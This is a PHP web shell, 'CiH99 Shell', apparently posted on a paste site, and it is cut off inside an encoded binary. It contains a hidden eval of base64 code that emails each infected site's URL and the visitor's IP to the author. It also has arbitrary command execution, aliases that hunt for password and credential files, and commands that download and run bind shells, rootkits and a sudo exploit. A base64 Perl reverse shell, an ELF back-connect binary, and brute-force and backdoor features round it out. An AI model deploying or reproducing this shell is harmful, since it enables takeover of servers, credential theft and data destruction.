· 7 years ago · Feb 04, 2019, 12:36 AM
1<?php
2#######################################
3## CiH99 Shell v8.1 2013 ##
4define('ch_ver',"8.2 2014"); ##
5## By CiH_H@CkErZ ##
6## � 25-6-2014 CiH_H@CkErZ ##
7#######################################
8$ch_name = ch_name(); ##
9#######################################
10#$ch_mainurl = "https://raw.githubusercontent.com/CiH777/cih99/master/cih99.txt";
11$ch_mainurl = "https://raw.githubusercontent.com/CiH777/safe-mode/master/";
12$cih99_updateurl = $ch_mainurl."cih99_update.php";
13$cih99_sourcesurl = $ch_mainurl."cih99.txt";
14$ch_sourcez = array(
15 "Safe" => array($ch_mainurl."safe.txt","safe.php"),
16 "Safe2" => array($ch_mainurl."safe2.txt","safe2.php"),
17 "Symlink" => array($ch_mainurl."sym.txt","sym.php"),
18 "Symlink2" => array($ch_mainurl."sym2.txt","sym2.php"),
19 "PorTScan" => array($ch_mainurl."PorT.txt","PorT.php"),
20 "Mailer" => array($ch_mainurl."Mailer.txt","Mailer.php"),
21 "Root" => array($ch_mainurl."r00t","r00t.txt"),
22);
23##[ AUTHENTICATION ]##
24$auth = array(
25 "login" => "",
26 "pass" => "",
27 "md5pass" => "",
28 "hostallow" => array("*"),
29 "denied" => "<a href=\"$ch_mainurl\">".$ch_name."</a>: access denied!",
30);
31##[ END AUTHENTICATION ]##
32$curdir = "./";
33$tmpdir = "";
34$tmpdir_logs = "./";
35$log_email = "cih_hacker@yahoo.com";
36$sess_cookie = "cih99cook";
37$sort_default = "0a";
38$sort_save = TRUE;
39$usefsbuff = TRUE;
40$copy_unset = FALSE;
41$surl_autofill_include = TRUE;
42$updatenow = FALSE;
43$gzipencode = TRUE;
44$filestealth = TRUE;
45$hexdump_lines = 8;
46$hexdump_rows = 24;
47$win = strtolower(substr(PHP_OS,0,3)) == "win";
48$disablefunc = getdisfunc();
49##[ END OF CONFIGS ]##
50error_reporting(E_ERROR | E_PARSE);
51@ini_set("max_execution_time",0);
52@set_time_limit(0); #No Cih in SafeMode
53@ignore_user_abort(TRUE);
54@set_magic_quotes_runtime(0);
55define("starttime",getmicrotime());
56if (get_magic_quotes_gpc()) { strips($GLOBALS); }
57$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
58@$f = $_REQUEST["f"];
59@extract($_REQUEST["cih99cook"]);
60foreach($_REQUEST as $k => $v) { if (!isset($$k)) { $$k = $v; } }
61$cihbuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIkNpSDk5U2hlbGwgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3I8YnI+IjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiY2loX2hhY2tlckB5YWhvby5jb20iLCRqdWR1bCwkYm9keSk7IH0NCn0NCmVsc2UgeyAkdmlzaXRjKys7IH0NCkBzZXRjb29raWUoInZpc2l0eiIsJHZpc2l0Yyk7"; eval(base64_decode($cihbuff));
62if ($surl_autofill_include) {
63 $include = "&";
64 foreach (explode("&",getenv("QUERY_STRING")) as $v) {
65 $v = explode("=",$v);
66 $name = urldecode($v[0]);
67 $value = @urldecode($v[1]);
68 foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {
69 if (strpos($value,$needle) === 0) {
70 $includestr .= urlencode($name)."=".urlencode($value)."&";
71 }
72 }
73 }
74}
75if (empty($surl)) {
76 $surl = "?".$includestr;
77 $surl = htmlspecialchars($surl);
78}
79## FILE TYPES ##
80$ftypes = array(
81 "html" => array("html","htm","shtml"),
82 "txt" => array("txt","conf","bat","ch","js","bak","doc","log","sfc","cfg","htaccess"),
83 "exe" => array("ch","install","bat","cmd"),
84 "ini" => array("ini","inf","conf"),
85 "code" => array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
86 "img" => array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
87 "sdb" => array("sdb"),
88 "phpsess" => array("sess"),
89 "download" => array("exe","com","pif","src","lnk","zip","rar","gz","tar")
90);
91$exeftypes = array(
92 getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
93 "perl %f%" => array("pl","cgi")
94);
95$regxp_highlight = array(
96 array(basename($_SERVER["PHP_SELF"]),1,"<font color=#FFFF00>","</font>"),
97 array("\.tgz$",1,"<font color=#C082FF>","</font>"),
98 array("\.gz$",1,"<font color=#C082FF>","</font>"),
99 array("\.tar$",1,"<font color=#C082FF>","</font>"),
100 array("\.bz2$",1,"<font color=#C082FF>","</font>"),
101 array("\.zip$",1,"<font color=#C082FF>","</font>"),
102 array("\.rar$",1,"<font color=#C082FF>","</font>"),
103 array("\.php$",1,"<font color=#00FF00>","</font>"),
104 array("\.php3$",1,"<font color=#00FF00>","</font>"),
105 array("\.php4$",1,"<font color=#00FF00>","</font>"),
106 array("\.jpg$",1,"<font color=#00FFFF>","</font>"),
107 array("\.jpeg$",1,"<font color=#00FFFF>","</font>"),
108 array("\.JPG$",1,"<font color=#00FFFF>","</font>"),
109 array("\.JPEG$",1,"<font color=#00FFFF>","</font>"),
110 array("\.ico$",1,"<font color=#00FFFF>","</font>"),
111 array("\.gif$",1,"<font color=#00FFFF>","</font>"),
112 array("\.png$",1,"<font color=#00FFFF>","</font>"),
113 array("\.htm$",1,"<font color=#00CCFF>","</font>"),
114 array("\.html$",1,"<font color=#00CCFF>","</font>"),
115 array("\.txt$",1,"<font color=#C0C0C0>","</font>")
116);
117## QUICK COMMANDS ##
118if (!$win) {
119 $cmdaliases = array(
120 array("", "ls -al"),
121 array("Find all suid files", "find / -type f -perm -04000 -ls"),
122 array("Find suid files in current dir", "find . -type f -perm -04000 -ls"),
123 array("Find all sgid files", "find / -type f -perm -02000 -ls"),
124 array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"),
125 array("Find config.inc.php files", "find / -type f -name config.inc.php"),
126 array("Find config* files", "find / -type f -name \"config*\""),
127 array("Find config* files in current dir", "find . -type f -name \"config*\""),
128 array("Find all writable folders and files", "find / -perm -2 -ls"),
129 array("Find all writable folders and files in current dir", "find . -perm -2 -ls"),
130 array("Find all writable folders", "find / -type d -perm -2 -ls"),
131 array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"),
132 array("Find all service.pwd files", "find / -type f -name service.pwd"),
133 array("Find service.pwd files in current dir", "find . -type f -name service.pwd"),
134 array("Find all .htpasswd files", "find / -type f -name .htpasswd"),
135 array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
136 array("Find all .bash_history files", "find / -type f -name .bash_history"),
137 array("Find .bash_history files in current dir", "find . -type f -name .bash_history"),
138 array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
139 array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
140 array("List file attributes on a Linux second extended file system", "lsattr -va"),
141 array("Show opened ports", "netstat -an | grep -i listen")
142 );
143 $cmdaliases2 = array(
144 array("-----",""),
145 array("Logged in users","w"),
146 array("Last to connect","lastlog"),
147 array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"),
148 array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"),
149 array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"),
150 array("Downloaders?","which wget curl w3m lynx fetch lwp-download"),
151 array("CPU Info","cat /proc/version /proc/cpuinfo"),
152 array("Is gcc installed ?","locate gcc"),
153 array("Format box (DANGEROUS)","rm -Rf"),
154 array("-----",""),
155 array("wget CiHBIND1","wget http://www.cih-iq.org/Tools/Hack/shCiH/cihbind.c"),
156 array("gcc CiHBIND2","gcc cihbind.c -o cihbind"),
157 array("Run CiHBIND2","./cihbind"),
158 array("-----",""),
159 array("wget CiH-LLS","wget http://www.cih-iq.org/Tools/Hack/shCiH/lls.pl"),
160 array("perl CiH-LLS","perl lls.pl"),
161 array("-----",""),
162 array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"),
163 array("wget & run BindDoor","wget ".$ch_mainurl."bind.tgz;tar -zxvf bind.tgz;./4877"),
164 array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"),
165 );
166}
167else {
168 $cmdaliases = array(
169 array("", "dir"),
170 array("Find index.php in current dir", "dir /s /w /b index.php"),
171 array("Find *config*.php in current dir", "dir /s /w /b *config*.php"),
172 array("Find c99shell in current dir", "find /c \"c99\" *"),
173 array("Find r57shell in current dir", "find /c \"r57\" *"),
174 array("Find cih99shell in current dir", "find /c \"cih99\" *"),
175 array("Show active connections", "netstat -an"),
176 array("Show running services", "net start"),
177 array("User accounts", "net user"),
178 array("Show computers", "net view"),
179 );
180}
181## PHP FILESYSTEM TRICKS (By CiH_H@CkErZ) ##
182$phpfsaliases = array(
183 array("Read File", "read", 1, "File", ""),
184 array("Write File (PHP5)", "write", 2, "File","Text"),
185 array("Copy", "copy", 2, "From", "To"),
186 array("Rename/Move", "rename", 2, "File", "To"),
187 array("Delete", "delete", 1 ,"File", ""),
188 array("Make Dir","mkdir", 1, "Dir", ""),
189 array("Download", "download", 2, "URL", "To"),
190 array("Download (Binary Safe)", "downloadbin", 2, "URL", "To"),
191 array("Change Perm (0755)", "chmod", 2, "File", "Perms"),
192 array("Find Writable Dir", "fwritabledir", 2 ,"Dir"),
193 array("Find Pathname Pattern", "glob",2 ,"Dir", "Pattern"),
194);
195## QUICK LAUNCH ##
196$quicklaunch1 = array(
197 array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" border=\"0\">",$surl),
198 array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" border=\"0\">","#\" onclick=\"history.back(1)"),
199 array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" border=\"0\">","#\" onclick=\"history.go(1)"),
200 array("<img src=\"".$surl."act=img&img=up\" alt=\"Up\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
201 array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" border=\"0\">",$surl."act=search&d=%d"),
202 array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" border=\"0\">",$surl."act=fsbuff&d=%d")
203);
204$quicklaunch2 = array(
205 array("Site List",$surl."act=Site"),
206 array("Security Info",$surl."act=security&d=%d"),
207 array("Processes",$surl."act=processes&d=%d"),
208 array("MySQL",$surl."act=sql&d=%d"),
209 array("Eval",$surl."act=eval&d=%d"),
210 array("Shells",$surl."act=cihinj"),
211 array("Encoder",$surl."act=encoder&d=%d"),
212 array("Vulnerability",$surl."act=vuln"),
213 array("Kill-Shell",$surl."act=selfremove"),
214 array("Feedback",$surl."act=feedback"),
215 array("Update",$surl."act=update"),
216 array("About",$surl."act=about")
217);
218if (!$win) {
219 $quicklaunch2[] = array("<br>BruteForce",$surl."act=ftpquickbrute&d=%d");
220 $quicklaunch2[] = array("Backdoor",$surl."act=cihb");
221 $quicklaunch2[] = array("Back-Connect",$surl."act=backc");
222 $quicklaunch2[] = array("Bypass",$surl."act=bypass");
223
224}
225
226## CiH Shell ##
227if (!function_exists("myshellexec")) {
228 if(is_callable("popen")) {
229 function myshellexec($cmd) {
230 if (!($p=popen("($cmd)2>&1","r"))) { return "popen Disabled!"; }
231 while (!feof($p)) {
232 $line=fgets($p,1024);
233 $out .= $line;
234 }
235 pclose($p);
236 return $out;
237 }
238 } else {
239 function myshellexec($cmd) {
240 global $disablefunc;
241 $result = "";
242 if (!empty($cmd)) {
243 if (is_callable("exec") and !in_array("exec",$disablefunc)) {
244 exec($cmd,$result);
245 $result = join("\n",$result);
246 } elseif (($result = $cmd) !== FALSE) {
247 } elseif (is_callable("system") and !in_array("system",$disablefunc)) {
248 $v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;
249 } elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {
250 $v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;
251 } elseif (is_resource($fp = popen($cmd,"r"))) {
252 $result = "";
253 while(!feof($fp)) { $result .= fread($fp,1024); }
254 pclose($fp);
255 }
256 }
257 return $result;
258 }
259 }
260}
261function ex($cfe) {
262 $res = '';
263 if (!empty($cfe)) {
264 if(function_exists('exec')) {
265 @exec($cfe,$res);
266 $res = join("\n",$res);
267 } elseif(function_exists('shell_exec')) {
268 $res = @shell_exec($cfe);
269 } elseif(function_exists('system')) {
270 @ob_start();
271 @system($cfe);
272 $res = @ob_get_contents();
273 @ob_end_clean();
274 } elseif(function_exists('passthru')) {
275 @ob_start();
276 @passthru($cfe);
277 $res = @ob_get_contents();
278 @ob_end_clean();
279 } elseif(@is_resource($f = @popen($cfe,"r"))) {
280 $res = "";
281 while(!@feof($f)) { $res .= @fread($f,1024); }
282 @pclose($f);
283 } else { $res = "Ex() Disabled!"; }
284 }
285 return $res;
286}
287## End of CiH Shell ##
288
289## HIGHLIGHT CODE ##
290$highlight_background = "#C0C0C0";
291$highlight_bg = "#FFFFFF";
292$highlight_comment = "#6A6A6A";
293$highlight_default = "#0000BB";
294$highlight_html = "#1300FF";
295$highlight_keyword = "#007700";
296$highlight_string = "#000000";
297####################
298##[ AUTHENTICATE ]##
299####################
300$tmp = array();
301foreach ($auth["hostallow"] as $k => $v) {
302 $tmp[] = str_replace("\\*",".*",preg_quote($v));
303}
304$s = "!^(".implode("|",$tmp).")$!i";
305if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {
306 exit("<a href=\"$ch_mainurl\">$ch_name</a>: Access Denied - Your host (".getenv("REMOTE_ADDR").") not allowed");
307}
308if (!empty($auth["login"])) {
309 if (empty($auth["md5pass"])) { $auth["md5pass"] = md5($auth["pass"]); }
310 if (($_SERVER["PHP_AUTH_USER"] != $auth["login"]) or (md5($_SERVER["PHP_AUTH_PW"]) != $auth["md5pass"])) {
311 header("WWW-Authenticate: Basic realm=\"".$ch_name.": Restricted Area\"");
312 header("HTTP/1.0 401 Unauthorized");
313 die($auth["denied"]);
314 }
315}
316## END AUTHENTICATE ##
317
318## Backdoor ##
319$back_connect_pl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiOyc7DQokc3lzdGVtMT0gJ2VjaG8gImBpZGAiOyc7DQokc3lzdGVtMj0gJ2VjaG8gImBwd2RgIjsnOw0KJHN5c3RlbTM9ICdlY2hvICJgd2hvYW1pYEBgaG9zdG5hbWVgOn4gPiI7JzsNCiRzeXN0ZW00PSAnL2Jpbi9zaCc7DQokMD0kY21kOw0KJHRhcmdldD0kQVJHVlswXTsNCiRwb3J0PSRBUkdWWzFdOw0KJGlhZGRyPWluZXRfYXRvbigkdGFyZ2V0KSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHByb3RvPWdldHByb3RvYnluYW1lKCd0Y3AnKTsNCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERPVVQsICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsICI+JlNPQ0tFVCIpOw0KcHJpbnQgIlxuXG46OiBjaWg5OS1zaGVsbCAoUHJpdmF0ZSBCdWlsZCB2MC4xKSByZXZlcnNlIHNoZWxsIDo6XG5cbiI7DQpwcmludCAiXG5TeXN0ZW0gSW5mbzogIjsgDQpzeXN0ZW0oJHN5c3RlbSk7DQpwcmludCAiXG5Zb3VyIElEOiAiOyANCnN5c3RlbSgkc3lzdGVtMSk7DQpwcmludCAiXG5DdXJyZW50IERpcmVjdG9yeTogIjsgDQpzeXN0ZW0oJHN5c3RlbTIpOw0KcHJpbnQgIlxuIjsNCnN5c3RlbSgkc3lzdGVtMyk7IHN5c3RlbSgkc3lzdGVtNCk7DQpjbG9zZShTVERJTik7DQpjbG9zZShTVERPVVQpOw0KY2xvc2UoU1RERVJSKTs=";
320$back_connect_c = "f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAA2IUECDQAAABMDAAAAAAAADQAIAAHACgAHAAZAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQILAkAACwJAAAFAAAAABAAAAEAAAAsCQAALJkECCyZBAg4AQAAPAEAAAYAAAAAEAAAAgAAAEAJAABAmQQIQJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAABQAAABEAAAAUAAAAAAAAAAAAAAARAAAAEgAAAAcAAAAKAAAACwAAAAgAAAAPAAAAAwAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAABgAAAAAAAAABAAAAAAAAAAkAAAAAAAAADAAAAAAAAAAAAAAADQAAAA4AAAACAAAABAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAAAAAABwBAAASAAAArAAAAAAAAABxAAAAEgAAADwAAAAAAAAACwIAABIAAABIAAAAAAAAAH0AAAASAAAAjAAAAAAAAACsAQAAEgAAAKUAAAAAAAAArwAAABIAAABjAAAAAAAAACcAAAASAAAAkwAAAAAAAADdAAAAEgAAAEMAAAAAAAAAOgAAABIAAABcAAAAAAAAAKoBAAASAAAAVgAAAAAAAAA2AAAAEgAAAHMAAAAAAAAA2QAAABIAAAB4AAAAAAAAACgAAAASAAAAbQAAAAAAAAAOAAAAEgAAAC4AAAAAAAAAeAAAABIAAAB9AAAA8IgECAQAAAARAA4ATwAAAAAAAAA5AAAAEgAAAAEAAAAAAAAAAAAAACAAAAAVAAAAAAAAAAAAAAAgAAAAAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18AbGliYy5zby42AGNvbm5lY3QAZXhlY2wAcGVycm9yAGR1cDIAc3lzdGVtAHNvY2tldABiemVybwBzdHJjYXQAaW5ldF9hZGRyAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABkYWVtb24AX19saWJjX3N0YXJ0X21haW4Ac3RybGVuAGNsb3NlAEdMSUJDXzIuMAAAAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAEAAgAAAAAAAQABACQAAAAQAAAAAAAAABBpaQ0AAAIAsgAAAAAAAAAImgQIBhMAABiaBAgHAQAAHJoECAcCAAAgmgQIBwMAACSaBAgHBAAAKJoECAcFAAAsmgQIBwYAADCaBAgHBwAANJoECAcIAAA4mgQIBwkAADyaBAgHCgAAQJoECAcLAABEmgQIBwwAAEiaBAgHDQAATJoECAcOAABQmgQIBw8AAFSaBAgHEQAAVYnlg+wI6EEBAADolAEAAOjnAwAAycMA/zUQmgQI/yUUmgQIAAAAAP8lGJoECGgAAAAA6eD/////JRyaBAhoCAAAAOnQ/////yUgmgQIaBAAAADpwP////8lJJoECGgYAAAA6bD/////JSiaBAhoIAAAAOmg/////yUsmgQIaCgAAADpkP////8lMJoECGgwAAAA6YD/////JTSaBAhoOAAAAOlw/////yU4mgQIaEAAAADpYP////8lPJoECGhIAAAA6VD/////JUCaBAhoUAAAAOlA/////yVEmgQIaFgAAADpMP////8lSJoECGhgAAAA6SD/////JUyaBAhoaAAAAOkQ/////yVQmgQIaHAAAADpAP////8lVJoECGh4AAAA6fD+//8x7V6J4YPk8FBUUmhoiAQIaBSIBAhRVmiAhgQI6E/////0kJBVieVT6AAAAABbgcMHFAAAUouD/P///4XAdAL/0FhbycOQkJBVieWD7AiAPWSaBAgAdA/rH412AIPABKNgmgQI/9KhYJoECIsQhdJ168YFZJoECAHJw4n2VYnlg+wIoTyZBAiFwHQZuAAAAACFwHQQg+wMaDyZBAj/0IPEEI12AMnDkJBVieVXVlOD7EyD5PC4AAAAAIPAD4PAD8HoBMHgBCnEjX2ovvSIBAj8uQcAAADzpI19r/y5DgAAALAA86qD7AhqAGoB6FD+//+DxBBmx0XIAgCD7AyLRQyDwAj/MOi3/v//g8QQD7fAg+wMUOi4/v//g8QQZolFyoPsDItFDIPABP8w6DH+//+D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